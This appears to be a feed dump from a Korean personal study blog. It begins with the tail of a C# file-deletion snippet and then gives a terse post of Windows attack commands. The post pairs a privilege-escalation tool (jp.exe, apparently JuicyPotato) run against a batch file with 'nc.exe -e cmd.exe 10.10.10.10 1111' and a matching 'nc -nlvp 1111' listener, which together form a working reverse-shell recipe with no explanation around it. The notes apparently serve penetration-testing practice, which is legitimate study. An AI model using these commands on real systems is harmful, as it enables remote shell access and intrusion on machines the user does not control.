(File.Exists(LICENSE_iFilePath)) { File.Delete(LICENSE_iFilePath); } }</code></pre> 공부/Programming a2sembly https://a2sembly.tistory.com/61 https://a2sembly.tistory.com/61#entry61comment Wed, 16 Aug 2023 16:37:05 +0900 https://a2sembly.tistory.com/60 <p data-ke-size="size16"><b><span style="background-color: #ffffff; color: #000000; text-align: left;">- Victim</span></b></p> <p data-ke-size="size16"><span style="background-color: #ffffff; color: #000000; text-align: left;">jp.exe -t * -p C:\Users\12\Desktop\2312\r-shell.bat.bat -l 1337 </span><span style="background-color: #ffffff; color: #000000; text-align: left;"></span></p> <p data-ke-size="size16"><b><span style="background-color: #ffffff; color: #000000; text-align: left;">- shell.bat </span></b></p> <p data-ke-size="size16"><span style="background-color: #ffffff; color: #000000; text-align: left;">START C:\Users\12\Desktop\2312\nc.exe -e cmd.exe 10.10.10.10 1111 </span></p> <p data-ke-size="size16"><b><span style="background-color: #ffffff; color: #000000; text-align: left;">- Client</span></b></p> <p data-ke-size="size16"><span style="background-color: #ffffff; color: #000000; text-align: left;">nc -nlvp 1111</span></p> 공부/ETC a2sembly https://a2sembly.tistory.com/60 https://a2sembly.tistory.com/60#entry60comment Fri, 11 Aug 2023 14:36:26 +0900